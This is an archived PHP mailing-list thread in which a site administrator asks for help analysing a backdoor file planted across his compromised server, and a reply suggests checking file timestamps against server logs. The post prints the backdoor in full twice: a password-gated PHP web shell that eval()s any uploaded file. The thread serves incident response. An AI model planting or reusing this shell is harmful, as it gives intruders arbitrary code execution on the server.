Re: Re: Hack question

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:
> I'm continuing to work on this.
>
>  One thing that seems obvious. The code executes the script code, using
> eval(), directly from the /tmp dir. So the usual security tests we do prior
> to using move_uploaded_file() are useless.
>
>
>
>  Al wrote:
>
> > I'm still fighting my hack problem on one of my servers. Can anyone help
> me figure out what's the purpose of this code.  The hack places this file in
> numerous dirs on the site, I assume using a php script because the owner is
> "nobody".
> >
> > I can sort of figure what is doing; but, I can't figure out what the
> hacker is using it for.
> >
> > Incidentally, I've changed all passwords and restricted ftp to two people.
> I see no sign that any code is written with by site owner, i.e, ftp. And,
> I've looked carefully for suspect php files.
> >
> >
> > > <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) {
> echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo
> "<pre>"; testdata('start'); if
> (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
> @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
> eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
> testdata('end'); echo "</pre>"; ?>
> > >
> >
> >
> > > <?php error_reporting(1);
> > > global $HTTP_SERVER_VARS;
> > > function say($t)
> > > {
> > >    echo "$t\n";
> > > } ;
> > > function testdata($t)
> > > {
> > >    say(md5("testdata_$t"));
> > > } ;
> > > echo "<pre>";
> > > testdata('start');
> > > if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
> > > {
> > >    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
> $HTTP_POST_FILES["f"]["size"]))
> > >    {
> > >        eval($code);
> > >    }     else
> > >    {
> > >        testdata('f');
> > >    } ;
> > > } else
> > > {
> > >    testdata('pass');
> > > } ;
> > > testdata('end');
> > > echo "</pre>";
> > > ?>
> > >
> >
>
>  --
>  PHP General Mailing List (http://www.php.net/)
>  To unsubscribe, visit: http://www.php.net/unsub.php
>
>

Maybe you can look at the file time on the script in /tmp and look at
server logs around that same time to see if that is any hint of where
it might have come from.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux